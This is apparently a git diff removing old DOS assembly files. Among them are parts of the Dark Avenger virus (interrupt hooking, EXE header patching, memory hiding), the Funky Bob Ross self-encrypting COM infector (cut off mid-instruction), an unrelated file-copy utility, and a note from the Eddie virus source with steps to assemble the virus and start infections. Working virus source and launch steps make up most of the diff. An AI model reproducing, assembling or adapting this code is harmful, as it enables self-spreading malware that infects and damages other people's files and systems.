header - -do_exe: - call mul_hdr - not ax - not dx - inc ax - jne calc_offs - inc dx -calc_offs: - add ax,word ptr [top_save+18h] - adc dx,word ptr [top_save+1ah] - mov cx,10h - div cx - mov word ptr [top_save+14h],startup-copyright - mov word ptr [top_save+16h],ax - add ax,(offset top_file-offset copyright-1)/16+1 - mov word ptr [top_save+0eh],ax - mov word ptr [top_save+10h],100h - add word ptr [top_save+18h],offset top_file - adc word ptr [top_save+1ah],0 - mov ax,word ptr [top_save+18h] - and ax,1ffh - mov word ptr [top_save+2],ax - pushf - mov ax,word ptr [top_save+19h] - shr byte ptr [top_save+1bh],1 - rcr ax,1 - popf - jz update_len - inc ax -update_len: - mov word ptr [top_save+4],ax - mov cx,18h -write_header: - mov dx,offset top_save - mov ah,40h - int 21h ;Write the file beginning -no_fuck: - pop dx - pop cx - popf - jc stop_fuck - mov ax,5701h ;Restore the original file date - int 21h -stop_fuck: - ret - -; The following is used by the INT 21h and INT 27h handlers in connection -; to the program hiding in memory from those who don't need to see it. -; The whole system is absurde and meaningless and it is also another source -; for program conflicts. - -alloc: - push ds - call get_chain - mov byte ptr ds:[0],'M' - pop ds - -; Assures that the program is the first one in the processes, -; which have intercepted INT 21h (yet another source of conflicts). - -ontop: - push ds - push ax - push bx - push dx - xor bx,bx - mov ds,bx - lds dx,ds:[21h*4] - cmp dx,offset int_21 - jne search_segment - mov ax,ds - mov bx,cs - cmp ax,bx - je test_complete - -; Searches the segment of the sucker who has intercepted INT 21h, in -; order to find where it has stored the old values and to replace them. -; Nothing is done for INT 27h. - - xor bx,bx -search_segment: - mov ax,[bx] - cmp ax,offset int_21 - jne search_next - mov ax,cs - cmp ax,[bx+2] - je got_him -search_next: - inc bx - jne search_segment - je return_control -got_him: - mov ax,word ptr cs:[save_int_21] - mov [bx],ax - mov ax,word ptr cs:[save_int_21+2] - mov [bx+2],ax - mov word ptr cs:[save_int_21],dx - mov word ptr cs:[save_int_21+2],ds - xor bx,bx - -; Even if he has not saved them in the same segment, this won't help him. - -return_control: - mov ds,bx - mov ds:[21h*4],offset int_21 - mov ds:[21h*4+2],cs -test_complete: - pop dx - pop bx - pop ax - pop ds - ret - -; Fetch the segment of the last MCB - -get_chain: - push ax - push bx - mov ah,62h - call function - mov ax,cs - dec ax - dec bx -next_blk: - mov ds,bx - stc - adc bx,ds:[3] - cmp bx,ax - jc next_blk - pop bx - pop ax - ret - -; Multiply by 16 - -mul_hdr: - mov ax,word ptr [top_save+8] -mul_16: - mov dx,10h - mul dx - ret - - db 'This program was written in the city of Sofia ' - db '(C) 1988-89 Dark Avenger',0 - -; INT 13h handler. -; Calls the original vectors in BIOS, if it's a writing call - -int_13: - cmp ah,3 - jnz subfn_ok - cmp dl,80h - jnc hdisk - db 0eah ;JMP XXXX:YYYY -my_size: ;--- Up to here comparison -disk: ; with the original is made - dd 0 -hdisk: - db 0eah ;JMP XXXX:YYYY -fdisk: - dd 0 -subfn_ok: - db 0eah ;JMP XXXX:YYYY -save_int_13: - dd 0 -call_adr: - dd 100h - -stack_pointer: - dd 0 ;The original value of SS:SP -my_save: - int 20h ;The original contents of the first - nop ;3 bytes of the file -top_file: ;--- Up to here the code is written -filehndl equ $ ; in the files -filename equ filehndl+2 ;Buffer for the name of the opened file -save_int_27 equ filename+65 ;Original INT 27h vector -save_int_21 equ save_int_27+4 ;Original INT 21h vector -aux_size equ save_int_21+4 ;--- Up to here is moved into memory -top_save equ save_int_21+4 ;Beginning of the buffer, which -contains - ; - The first 24 bytes read from file - ; - File length (4 bytes) - ; - The last bytes of the file - ; (my_size bytes) -top_bz equ top_save-copyright -my_bz equ my_size-copyright - -code ends - end diff --git a/a/Avengsrc.asm b/a/Avengsrc.asm index d0e0318..0fdbc0f 100755 --- a/a/Avengsrc.asm +++ b/a/Avengsrc.asm @@ -1,23 +1,3 @@ - - - - - - -OK, Rob - here ya' go. As I understand it, this is only one revision level -lower than the "current" version of the virus -- but I have no idea what the -differences are between the two. Sigh. TASM can be used to assemble the -code, then you can replace (using DEBUG) the first 3 bytes of the linked -.COM file to 9H 65 00 to jump to the start of the virus code. I have been -unable to cause the resulting executable to infect file on floppy until the -virus is run on a hard drive first. So, to begin infections (after -assembling/linking/editing the executable): 1) Run the modified executable, -2) Run a program on your hard drive. From there it will spread to files on -the hard drive and the floppy. FluShot+ makes a good monitor for watching -this virus at work. Have fun! - -Thanks for your help, and thanks for a great weekend. - ;************************ ;* * ;* E D D I E * diff --git a/b/BAC (24).ASM b/b/BAC (24).ASM deleted file mode 100755 index b7e8a12..0000000 --- a/b/BAC (24).ASM +++ /dev/null @@ -1,364 +0,0 @@ -BAC segment para public 'code' - assume cs:BAC, ds:BAC, es:BAC, ss:NOTHING - org 100h ; .COM format -BEGIN: - jmp CODE_START ; Jump around data declarations -DECLARE: ; Messages, Storage Areas, Equates - COPYRIGHT db 'BACopy (C) 1985, Dickinson Associates Inc.' - db 13,10,'$' - PATH_FILE_LEN equ 77 ;Length = 1, Path = 63, FileName = 12, 0 = 1 - SOURCE_FILE db PATH_FILE_LEN dup (0) - TARGET_PATH db PATH_FILE_LEN dup (0) - SOURCE_END dw 0 - TARGET_END dw 0 - SOURCE_HANDLE dw 0 - TARGET_HANDLE dw 0 - SOURCE_DTA db 44 dup(0) - TARGET_DTA db 44 dup(0) - VALID_IN db 'abcdefghijklmnopqrstuvwxyz,;=',9 - VALID_OUT db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',4 dup(32) - VALID_NUM equ $ - VALID_OUT + 1 - BLKSIZE dw 0 - LAST_BLOCK db 0 - EVENT_FLAG db 0 - ERR_HEAD db 10,13,'BACopy Error - $' - NO_PARMS db 'Correct Syntax is:',13,10,10 - db 'BACopy [d:][source_path]source_filename[.ext] [d:][target_path]$' - FILE_NOT_FOUND db 'File Not Found$' - SOURCE_ERROR db 'Opening Source File$' - CREATE_ERROR db 'Creating Target File$' - TARGET_FULL db '!!',10,10,13,'Target Disk is Full',13,10,10 - db 'Insert New Disk and Press [Enter]',7,'$' - ERR_TAIL db 10,10,13,' . . . Aborting',10,13,13,'$' - CONFIRM_MSG_1 db ' . . $' - CONFIRM_MSG_2 db 'BACopied to . . $' - END_LINE db 10,13,'$' - NOTHING_TO_DO db 13,10,'No Files Needed to be BACopied',13,10,'$' -; -CODE_START: ; Parse command line into source & target parameters - mov dx,offset COPYRIGHT ; Display copyright notice - mov ah,9h - int 21h - mov si,80h ; PSP parameter byte count pointer - mov cl,[si] ; Move byte count to CL - xor ch,ch ; Zero CH - jcxz NO_PARMS_PASSED ; If CX is zero, there are no parameters - mov dx,cx ; Save byte count in dx - inc si ; Point to parameter area - mov di,si ; Copy SI to DI for cleanup routine - cld ; Set direction flag to forward -CLEAN_PARMS: ; Change valid delimiters to blanks, lower to upper case - lodsb ; Load each character to AL - push di ; Save DI on stack - mov di,offset VALID_IN ; Point to table of valid inputs - push cx ; Save CX on stack - mov cx,VALID_NUM ; Set CX to number of inputs to look for -repne scasb ; See if any are in AL - jcxz CLEAN_END ; If not, change nothing - mov bx,VALID_NUM ; Set up BX to point to valid output - sub bx,cx ; This will leave BX one off - mov al,VALID_OUT [bx - 1] ; Load the valid output to AL -CLEAN_END: - pop cx ; Restore CX - pop di ; Restore DI - stosb ; Store modified AL back to PSP -loop CLEAN_PARMS ; Loop until CX is zero -; - mov cx,dx ; Restore number of bytes in PSP to CX - mov dx,2 ; Set DX to look for up to 2 parameters - mov bx,offset SOURCE_FILE ; Set BX to address of 1st parameter - mov al,' ' ; Set up to scan for first non-blank - mov di,81h ; Set DI to PC-DOS parameter pointer -FIND_PARMS: ; Start looking for parameters, load to program storage -repe scasb ; Scan while blanks - mov si,di ; Set SI to second non-blank byte - dec si ; Adjust it to first non-blank byte - inc cx ; Adjust CX to compensate - jcxz PARMS_LOADED ; If CX is zero, no parameters left - mov di,bx ; Set DI to parameter hold area - mov ax,cx ; Store CX to first byte of hold area - stosb ; DI is adjusted to second byte here -STORE: lodsb ; Load each byte to AL - cmp al,' ' ; Is it a blank? - jz END_STORE ; Yes, end of this parameter - stosb ; No, store the byte to hold area -END_STORE: - loopnz STORE ; Keep looking - sub [bx],cx ; Store number of bytes in each - jcxz PARMS_LOADED ; If CX is zero, no more parameters - dec byte ptr [bx] ; parameter to first byte of hold area - mov di,si ; Set up to scan for next non-blank - dec di ; Adjust DI to point to the blank - inc cx ; Adjust CX to compensate - dec dx ; Decrement DX counter - cmp dx,0 ; Is DX zero? - jz PARMS_LOADED ; Yes, all expected parameters loaded - add bx,PATH_FILE_LEN ; No, point to next part of hold area - jmp FIND_PARMS ; Go back and look for more -PARMS_LOADED: ; All parameters are loaded - cmp SOURCE_FILE[0],0 ; If there are no bytes in the - ja FIX_UP ; SOURCE_FILE, no parameters present -NO_PARMS_PASSED: ; Exit with an error if there - mov dx,offset NO_PARMS ; are no parameters passed - jmp ERROR_EXIT -FIX_UP: ; Fix SOURCE_FILE and TARGET_PATH - mov si,offset SOURCE_FILE ; For Search calls - lodsb ; Get Number of bytes - xor ah,ah ; Zero high byte of AX - mov di,si ; Move SI to DI for scan - add di,ax ; Start scan at end of parameter - dec di ; Adjust DI - mov cx,ax ; Set CX to number of bytes - mov al,'\' ; Scan for the last '\' - std ; Set direction flag to reverse -repnz scasb ; Scan while not '\' - jnz NO_SOURCE_DIR ; If Zero Flag not set, '\' not found - add di,2 ; Add 2 to DI to point to file name - jmp SOURCE_FIXED ; position -NO_SOURCE_DIR: ; No source directory was specified - add di,1 ; Adjust DI - cmp SOURCE_FILE[2],':' ; Check for specified disk drive - jne SOURCE_FIXED ; None present, we're done - mov di,offset SOURCE_FILE[3]; Yes, set DI to point to first byte -SOURCE_FIXED: ; after ':' - mov SOURCE_END,di ; Move DI to SOURCE_END pointer -; - cld ; Set direction flag to forward - mov si,offset TARGET_PATH ; Set up to look for '\' present - lodsb ; Get number of bytes - cmp al,0 ; If it's zero, no target specified - je NO_TARGET - xor ah,ah ; Zero high byte of AX - add si,ax ; Add it to SI to point to end - dec si ; Decrement SI to adjust - lodsb ; Look at last byte - mov di,si ; Copy SI to DI - cmp al,'\' ; Is last byte a '\'? - je TARGET_FIXED ; Yes, everything's fine - cmp TARGET_PATH[0],2 ; If TARGET_PATH is 2 bytes long and - jne STORE_SLASH ; is a disk drive specification, - cmp TARGET_PATH[2],':' ; let it default to the current - je TARGET_FIXED ; directory. -STORE_SLASH: ; Place a '\' at the end of - mov al,'\' ; TARGET_PATH if user did - stosb ; not -TARGET_FIXED: - mov TARGET_END,di ; Move DI to TARGET_END pointer - jmp BUFFER_SIZE -NO_TARGET: ; Set up to allow target path default - mov TARGET_END,offset TARGET_PATH + 1 ; to current path -BUFFER_SIZE: ; Compute size of file buffer - mov ax,0fdffh ; Leave plenty of room in segment - mov dx,offset FILE_BUFFER ; for stack & set DX to end of code - sub ax,dx ; Subtract - mov BLKSIZE,ax ; Save result in BLKSIZE -FIND_FILE: ; Find first source file - xor ax,ax ; Request to use SOURCE_DTA - mov ah,1ah ; to house FCB for SOURCE_FILE - mov dx,offset SOURCE_DTA - int 21h ; Call PC-DOS - mov dx,offset SOURCE_FILE + 1 ; DX points to SOURCE_FILE - mov ah,4eh ; Request function 4EH (find 1st file) - mov cx,0 ; Set CX to zero for normal files only - int 21h ; Call PC-DOS - jnc FOUND_FILE ; If no error, first file found - mov dx,offset FILE_NOT_FOUND; If no files found, exit - jmp ERROR_EXIT ; program with error message -FOUND_FILE: - mov LAST_BLOCK,0 ; Initalize last block read flag - mov si,offset SOURCE_DTA+30 ; SI points to source file name in DTA - mov di,SOURCE_END ; DI points to end of source path - push si ; Save pointer to source file name - mov cx,13 ; DTA will have 13 bytes -rep movsb ; Move name bytes to SOURCE_FILE - mov di,TARGET_END ; DI points to end of target path - pop si ; Recover pointer to source file name - mov cx,13 ; DTA will have 13 bytes -rep movsb ; Move file name bytes to TARGET_PATH -FIND_TARGET: ; Find matching target file - mov ah,1ah ; Request to use TARGET_DTA - xor al,al ; to house FCB for TARGET_PATH - mov dx,offset TARGET_DTA - int 21h ; Call PC-DOS - mov ah,4eh ; Request find 1st file for target - mov dx,offset TARGET_PATH+1 - mov cx,0 ; Set CX to zero for normal files only - int 21h ; Call PC-DOS - jc OPEN_SOURCE ; If not found, bypass date & time check -CHECK_TIME_DATE: ; Check time & date stamps in DTAs - mov si,offset SOURCE_DTA+24 ; Load source file date stamp to AX - lodsw - mov dx,ax ; Save in DX - mov si,offset TARGET_DTA+24 ; Load target file date stamp to AX - lodsw - cmp dx,ax ; If Source file newer, jump - ja OPEN_SOURCE ; to OPEN_SOURCE - jne DONT_COPY ; If Source file older, don't copy it - mov si,offset SOURCE_DTA+22 ; Otherwise, - lodsw ; load source time stamp to AX - mov dx,ax ; Save in DX - mov si,offset TARGET_DTA+22 ; Load target time stamp to AX - lodsw - cmp dx,ax ; If Source file newer, jump - ja OPEN_SOURCE ; to OPEN_SOURCE - jmp DONT_COPY -DONT_COPY: ; Otherwise, - call CLOSE_ALL ; Close all files - jmp NEXT_FILE ; Check for next file -OPEN_SOURCE: - mov ah,3dh ; Request Open Source File - mov dx,offset SOURCE_FILE+1 ; DX points to source file path name - mov al,0 ; with read permission only - int 21h ; Call PC-DOS - mov SOURCE_HANDLE,ax ; Save handle in memory - jnc CREATE_TARGET ; If no carry, open was good - mov dx,offset SOURCE_ERROR ; Otherwise, exit with error - mov SOURCE_HANDLE,0 ; Make sure CLOSE_ALL ignores handle - jmp ERROR_EXIT -CREATE_TARGET: - xor ax,ax - mov ah,3ch ; Request create & open a file - mov dx,offset TARGET_PATH+1 ; named the target file - xor cx,cx ; with normal attribute - int 21h ; Call PC-DOS - mov TARGET_HANDLE,ax ; Save target handle - jnc PROCEED_TO_COPY ; If no carry, create / open is ok - mov dx,offset CREATE_ERROR ; Otherwise, exit with an error - mov TARGET_HANDLE,0 ; Make sure CLOSE_ALL ignores target - jmp ERROR_EXIT -PROCEED_TO_COPY: ; The heart of the matter - mov si,offset SOURCE_FILE+1 ; Point to source file -START1: lodsb ; Load each byte to AL - cmp al,0 ; If ASCII 0, end of field - je DOTS - mov dl,al ; Copy byte to DL for funciton 2H - mov ah,2h ; Request function 2H - int 21h ; Call PC-DOS - jmp START1 ; Get next character -DOTS: mov ah,9h ; Confirm start of task - mov dx,offset CONFIRM_MSG_1 - int 21h -KEEP_COPYING: - mov ah,3fh ; Request read block of data - mov cx,BLKSIZE ; BLKSIZE bytes long - mov bx,SOURCE_HANDLE ; from source file - mov dx,offset FILE_BUFFER ; into buffer - int 21h ; Call PC-DOS - cmp ax,0 ; If AX is 0, no bytes were - je FINISH ; read, and we're done - mov cx,ax ; Move AX to CX for write call (below) - cmp cx,BLKSIZE ; Check number of bytes read against - je MORE_TO_COME ; request. If equal, we got them all, - mov LAST_BLOCK,1 ; otherwise, it's the last block of file -MORE_TO_COME: ; - push cx ; Save requested write count on stack - mov ah,40h ; Request write block of data - mov bx,TARGET_HANDLE ; to target file - mov dx,offset FILE_BUFFER ; from file buffer - int 21h ; Call PC-DOS - pop cx ; Recover requested write count - cmp ax,cx ; If CX equals AX, - je WRITE_OK ; write was successful, -DISK_FULL: - call CLOSE_ALL ; Otherwise disk is full -- close files - mov ah,41h ; Request erase file - mov dx,offset TARGET_PATH+1 ; for incomplete target. - int 21h ; Call PC-DOS - mov dx,offset TARGET_FULL - mov ah,9h - int 21h -READ_KEYBOARD: ; Prompt requested [Enter] key - mov ah,8h ; Make sure [Ctrl]-[Break] is detected - int 21h ; Call PC-DOS for key - cmp al,13 ; Check for [Enter] - jne READ_KEYBOARD ; (no extended codes are 13) - mov cx,2 -END_FULL: - mov dx,offset END_LINE ; Send a new line to screen - mov ah,9h - int 21h - loop END_FULL - jmp FOUND_FILE ; Re-start from FOUND_FILE: -WRITE_OK: - cmp LAST_BLOCK,1 ; If this is the last block, - je FINISH ; we're done - jmp KEEP_COPYING ; Otherwise, keep going. -FINISH: ; Force target time & date stamps - mov ah,57h ; to equal source, close files - mov al,0 ; Request get time and date stamos - mov bx,SOURCE_HANDLE ; for source file - int 21h ; DX & CX contain data - mov ah,57h ; Request set date and time - mov al,1 ; to force target file to - mov bx,TARGET_HANDLE ; source stamp - int 21h ; Call PC-DOS - call CLOSE_ALL ; Go close all files - mov dx,offset CONFIRM_MSG_2 ; Confirm completion of task - mov ah,9h ; Request function 9H - int 21h ; Call PC-DOS - mov si,offset TARGET_PATH+1 ; Point to source file -START2: lodsb ; Load each byte to AL - cmp al,0 ; If ASCII 0, end of field - je CR_LF - mov dl,al ; Copy byte to DL for funciton 2H - mov ah,2h ; Request function 2H - int 21h ; Call PC-DOS - jmp START2 ; Get next character -CR_LF: mov dx,offset END_LINE ; Terminate display line - mov ah,9h ; Request function 9H - int 21h - mov EVENT_FLAG,1 ; Set flag to indicate file was copied -NEXT_FILE: ; Go Look for next file - xor ax,ax - mov ah,1ah ; Request to use SOURCE_DTA - mov dx,offset SOURCE_DTA ; to house FCB for SOURCE_FILE - int 21h ; Call PC-DOS - mov ah,4fh ; Request find next source file - mov cx,0 ; Normal files only - int 21h ; Call PC-DOS - jnc FOUND_ANOTHER ; No error, another file was found - jmp END_OK ; Error, we're done finding files -FOUND_ANOTHER: - jmp FOUND_FILE ; Go process next file -END_OK: cmp EVENT_FLAG,1 ; Did anything happen? - je EXIT ; Yes, just exit - mov dx,offset NOTHING_TO_DO ; No, tell user that nothing happened - mov ah,9h - int 21h -EXIT: int 20h ; Exit to PC-DOS -ERROR_EXIT: ; Print Error Message and Exit - push dx ; Save error message pointer on stack - mov ah,9 ; Display error header - mov dx,offset ERR_HEAD - int 21h - mov ah,9 ; Display error message - pop dx - int 21h - mov ah,9 ; Display error tail - mov dx,offset ERR_TAIL - call CLOSE_ALL - int 21h - int 20h ; Exit to PC-DOS - - -CLOSE_ALL proc - cmp SOURCE_HANDLE,0 ; Check for valid SOURCE_HANDLE - je CLOSE_TARGET ; None, then go close target - mov ah,3eh ; Request close file - mov bx,SOURCE_HANDLE ; for source handle - int 21h ; Call PC-DOS - mov SOURCE_HANDLE,0 ; Refresh handle -CLOSE_TARGET: - cmp TARGET_HANDLE,0 ; Check for valid TARGET_HANDLE - je CLOSE_RETURN ; None, then return - mov bx,TARGET_HANDLE ; Request close file - mov ah,3eh ; for target handle - int 21h ; Call PC-DOS - mov TARGET_HANDLE,0 ; Refresh handle -CLOSE_RETURN: - ret -CLOSE_ALL endp -FILE_BUFFER label word -BAC ends - end BEGIN - \ No newline at end of file diff --git a/b/BOBVIRUS (26).ASM b/b/BOBVIRUS (26).ASM deleted file mode 100755 index 21bbebc..0000000 --- a/b/BOBVIRUS (26).ASM +++ /dev/null @@ -1,565 +0,0 @@ -; The Funky Bob Ross Virus Version 1.0 -; Written by Dark Angel / 26 September 1991 / (c) 1991 -; PHALCON/SKISM Co-op -; Effective length: 1125, Resident length: 672 bytes -; -; DEDICATION: -; This virus was written expressedly to -; 1) Piss off Patty Hoffman, John McAffee, Ross Greenberg, and all the -; other guru-wanna-bes in this world. -; 2) Spread the message of The Almighty Bob, and so enrichen the lives -; of people all over the world. -; 3) Show off (Now I can tell people that I wrote a virus!) -; -; WHAT THIS IS: -; This is a self-encrypting, non-overwriting COM infector. It doesn't do -; anything to EXE files. File sizes increase by 1117 bytes. It goes off -; on July 9th of any year or after 7 infection "waves." -; -; WHAT IT DOES WHEN IT GOES OFF: -; The virus goes memory resident and prints out a Bobism every 5 minutes. -; It then enters a delay loop for approximately 5 seconds, allowing for a -; brief moment of silence while the victim reads Bob's holy message. The -; virus will not destroy anything. The virus will not go TSR if it finds -; another copy of itself in memory. -; -; CAUTION: THIS IS DESTRUCTIVE CODE. YOU SHOULD NOT EVEN BE LOOKING AT IT. -; I HAVE NEVER AND WILL NEVER RELEASE THIS CODE. IF YOU SHOULD BE -; LOOKING AT IT, IT IS BECAUSE IT WAS STOLEN FROM ME. YOU HAVE NO -; RIGHT TO LOOK AT THIS CODE. IF THIS SOURCE SHOULD FALL INTO THE -; WRONG HANDS, IT COULD BE VERY BAD! DESTROY THIS IMMEDIATELY. I -; HOLD NO RESPONSIBILITY FOR WHAT STUPID PEOPLE DO WITH THIS CODE. -; THIS WAS WRITTEN FOR EDUCATIONAL PURPOSES ONLY!!! - -CODE SEGMENT PUBLIC 'CODE' - ORG 100h - ASSUME CS:CODE,DS:CODE,SS:CODE,ES:CODE - -DTA_fileattr EQU 21 -DTA_filetime EQU 22 -DTA_filedate EQU 24 -DTA_filesize EQU 26 -DTA_filename EQU 30 - -virus_marker equ 026FFh ; JMP WORD PTR -virus_marker2 equ 00104h ; 0104h -part1_size equ part1_end - part1_start -part2_size equ part2_end - part2_start -offset_off equ duh2 -init_delay equ 5280 ; Initial delay -delay equ 400 ; Subsequent delay -num_Messages equ 7 ; Number of Bob messages -waves equ 7 ; Number of waves to go off after -infec_date equ 0709h ; Date of psychosis - -Counter equ 108h -D_Mess equ 110h -Int_08_Start equ 112h - -part1_start: - jmp word ptr duh -duh dw middle_part_end - part1_start + 100h -duh2 dw 0 -part1_end: - -middle_part_start: -middle_part_end: - -;============================================================================= -;Part 2 begins: Dis is the D-Cool part -;============================================================================= -part2_start: - cld - call decrypt - mov si, offset Go - add si, offset_off - jmp si - -encrypt_val db 00h - -decrypt: -encrypt: - mov si, offset encrypt_val - add si, offset_off - mov ah, byte ptr [si] - - mov cx, offset part2_end - offset bam_bam - add si, offset bam_bam - offset encrypt_val - mov di, si - -xor_loop: - lodsb ; DS:[SI] -> AL - xor al, ah - stosb - loop xor_loop - ret - -copy_rest_stuff: -; Mah copying routine - push si ; SI -> buffer3 - call encrypt - mov cx, part2_size - pop dx - add dx, offset part2_start - offset buffer3 - mov ah, 40h - int 21h - call decrypt -bam_bam: - ret - -buffer db 0CDh, 20h, 0, 0, 0, 0, 0, 0 -buffer2 db part1_end - part1_start dup (?) -buffer3 dw ? -orig_path db 64 dup (?) -num_infec db 0 ; Infection wave number -infec_now db 0 ; Number files infected this time -root_dir db '\',0 -com_mask db '*.com',0 -dir_mask db '*.*',0 -back_dir db '..',0 -nest dw 0 - -DTA db 43 DUP (0) ; For use by infect_dir - -Go: - add si, offset buffer - offset Go - mov di, si - add di, offset buffer2 - offset buffer - mov cx, part1_size - rep movsb - - mov ah, 47h ; Get directory - xor dl,dl ; Default drive - add si, offset orig_path - offset buffer - 8 ; DS:[SI] -> buffer - int 21h ; in orig_path - jc Go_Error - - mov ah, 3Bh ; Change directory - mov dx, si ; to the root dir - add dx, offset root_dir - offset orig_path - int 21h - jc Go_Error - - add si, offset num_infec - offset orig_path - inc byte ptr [si] ; New infection wave - - push si ; Save offset num_infec - - add si, offset infec_now - offset num_infec - mov byte ptr [si], 3 ; Reset infection - ; counter to 3 - ; for D-new run. - - call traverse_fcn ; Do all the work - - pop si ; Restore offset num_infec - cmp byte ptr [si], waves ; 10 infection waves? - jge Go_Psycho ; If so, activate - - mov ah, 2Ah ; Get date - int 21h - cmp dx, infec_date ; Is it 07/09? - jz Go_Psycho ; If so, activate -Go_Error: - jmp quit ; And then quit - -Go_Psycho: - jmp Psycho - -origattr db 0 -origtime dw 0 -origdate dw 0 -filesize dw 0 ; Size of the uninfected file - -oldhandle dw 0 - -;============================================================================= -;D-Traversal function begins -;============================================================================= -traverse_fcn proc near - push bp ; Create stack frame - mov bp,sp - sub sp,44 ; Allocate space for DTA - push si - - jmp infect_directory -In_fcn: - mov ah,1Ah ;Set DTA - lea dx,word ptr [bp-44] ; to space allotted - int 21h ;Do it now, do it hard! - - mov ah, 4Eh ;Find first - mov cx,16 ;Directory mask - mov dx,offset dir_mask ; *.* - add dx,offset_off - int 21h - jmp short isdirok -gonow: - cmp byte ptr [bp-14], '.' ;Is first char == '.'? - je short donext ; If so, loop again - lea dx,word ptr [bp-14] ;else load dirname - mov ah,3Bh ; and changedir there - int 21h ;Yup, yup - jc short donext ; Do next if invalid - mov si, offset nest ; Else increment nest - add si, offset_off - inc word ptr [si] ; nest++ - call near ptr traverse_fcn ; recurse directory -donext: - lea dx,word ptr [bp-44] ;Load space allocated for DTA address - mov ah,1Ah ; and set DTA to it - int 21h ; 'cause it might have changed - - mov ah,4Fh ;Find next - int 21h -isdirok: - jnc gonow ;If OK, jmp elsewhere - mov si, offset nest - add si, offset_off - cmp word ptr [si], 0 ;If root directory (nest == 0) - jle short cleanup ; Quit - dec word ptr [si] ;Else decrement nest - mov dx,offset back_dir ;'..' - add dx, offset_off - mov ah,3Bh ;Change directory - int 21h ; to previous one -cleanup: - pop si - mov sp,bp - pop bp - ret -traverse_fcn endp -;============================================================================= -;D-Traversal function ends -;============================================================================= - -Goto_Error: - jmp Error - -enuff_for_now: - ;Set nest to nil - mov si, offset nest ; in order to - add si, offset_off ; halt the D-Cool - mov word ptr [si], 0 ; traversal fcn - jmp short cleanup -return_to_fcn: - jmp short In_fcn ;Return to traversal function - -infect_directory: - mov ah, 1Ah ;Set DTA - mov dx, offset DTA ; to DTA struct - add dx, offset_off - int 21h - -find_first_COM: - mov ah, 04Eh ; Find first file - mov cx, 0007h ; Any file - mov dx, offset com_mask ; DS:[DX] --> filemask - add dx, offset_off - int 21h ; Fill DTA (hopefully) - jc return_to_fcn ; Error #E421:0.1 - jmp check_if_COM_infected ; I<___-Cool! Found one! - -find_next_file2: - mov si, offset infec_now ; Another loop, - add si, offset_off ; Another infection - dec byte ptr [si] ; Infected three? - jz enuff_for_now ; If so, exit -find_next_file: - mov ah,4Fh ; Find next - int 21h - jc return_to_fcn - -check_if_COM_infected: - mov si, offset DTA + dta_filename + 6 ; look at 7th letter - add si, offset_off - cmp byte ptr [si], 'D' ; ??????D.COM? - jz find_next_file ; don't kill COMMAND.COM - - mov ax,3D00h ; Open channel read ONLY - mov dx, si ; Offset Pathname in DX - sub dx, 6 - int 21h ; Open NOW! - jc find_next_file ; If error, find another - - xchg bx,ax ; bx is now handle - mov ah,3Fh ; Save - mov cx, part1_size ; first part - mov dx, offset buffer ; to buffer - add dx, offset_off ; to be restored - push dx - int 21h ; later - - pop si ; Check for virus ID bytes - ; in the buffer - push si - lodsw ; DS:[SI] -> AX - cmp ax, virus_marker ; Compare it - jnz infect_it ; infect it if ID #1 not found - - lodsw ; Check next two bytes - cmp ax, virus_marker2 ; Compare it - jnz infect_it ; infect if ID #2 not found - pop si -bomb_out: - mov ah, 3Eh ; else close the file - int 21h ; and go find another - jmp find_next_file ; 'cuz it's already infected - -Signature db 'PHALCON' - -;============================================================================= -;D-Good Stuff - Infection routine -;============================================================================= -infect_it: - ; save fileattr - pop si - add si, offset DTA + DTA_fileattr - offset buffer - mov di, si - add di, offset origattr - offset DTA - DTA_fileattr - movsb ; DS:[SI] -> ES:[DI] - movsw ; Save origtime - movsw ; Save origdate - movsw ; Save filesize - ; Only need LSW - ; because COM files - ; can only be up to - ; 65535 bytes long - cmp word ptr [si - 2], part1_size - jl bomb_out ; is less than 8 bytes. - -do_again: - mov ah, 2Ch ; get time - int 21h - add dl, dh ; 1/100 sec + 1 sec - jz do_again ; Don't want orig strain! - - mov si, offset encrypt_val - add si, offset_off - mov byte ptr [si], dl ; 255 mutations - - mov ax, 4301h ; Set file attributes - xor cx, cx ; to nothing - mov dx, si ; filename in DTA - add dx, offset DTA + DTA_filename - offset encrypt_val - int 21h ; do it now, my child - - mov ah, 3Eh ; Close file - int 21h ; handle in BX - - mov ax, 3D02h ; Open file read/write - int 21h ; Filename offset in DX - jc bomb_out ; Damn! Probs - - mov di, dx - add di, offset oldhandle - offset DTA - DTA_filename - ; copy filehandle to - ; oldhandle - stosw ; AX -> ES:[DI] - xchg ax, bx ; file handle in BX now - - mov ah, 40h ; Write DS:[DX]->file - mov cx, part1_size - 4 ; number of bytes - mov dx, 0100h ; where code starts - int 21h ; (in memory) - - mov ah, 40h - mov si, di ; mov si, offset filesize - add si, offset filesize - 2 - offset oldhandle - add word ptr [si], 0100h - mov cx, 2 - mov dx, si - int 21h ; write jmp offset - - mov ax, [si] ; AX = filesize - sub ax, 0108h - - add si, offset buffer3 - offset filesize - push si - mov word ptr [si], ax - mov ah, 40h - mov cx, 2 - mov dx, si - int 21h - - mov ax, 4202h ; move file ptr - xor cx, cx ; from EOF - xor dx, dx ; offset cx:dx - int 21h - - call copy_rest_stuff - - pop si - add si, offset oldhandle - offset buffer3 - mov bx, word ptr [si] - mov ax, 5701h ; Restore - add si, offset origtime - offset oldhandle - mov cx, word ptr [si] ; old time and - add si, 2 - mov dx, word ptr [si] ; date - int 21h - - mov ah, 3Eh ; Close file - int 21h - - mov ax, 4301h ; Restore file - xor ch, ch - add si, offset origattr - offset origtime - 2 - mov cl, byte ptr [si] ; attributes - mov dx, si ; filename in DTA - add dx, offset DTA + DTA_filename - offset origattr - int 21h ; do it now - - jmp find_next_file2 - -GotoError: - jmp error - -Psycho: -; Check if already installed - push es - mov byte ptr cs:[100h],0 ; Initialize fingerprint - xor bx, bx ; Zero BX for start - mov ax, cs -Init1: inc bx ; Increment search segment - mov es, bx ; value - cmp ax, bx ; Not installed if we reach - je Not_Installed_Yet ; the current segment - mov si, 100h ; Search segment for - mov di, si ; fingerprint in first - mov cx, 4 ; four bytes - repe cmpsb ; Compare - jne init1 ; If not equal, try another - jmp Quit_Init ; else already installed - -Not_Installed_Yet: - pop es - mov word ptr cs:[Counter], init_delay - mov word ptr cs:[D_Mess], 1 - -; Copy interrupt handler to beginning of code - mov si, offset _int_08_handler - add si, offset_off - mov di, Int_08_Start - mov cx, int_end - int_start - rep movsb ; DS:[SI]->ES:[DI] - - mov ax, 3508h ; Get int 8 handler - int 21h ; put in ES:BX - - mov cs:[duh], bx ; Save old handler - mov cs:[duh+2], es ; in cs:[104h] - - mov ax, 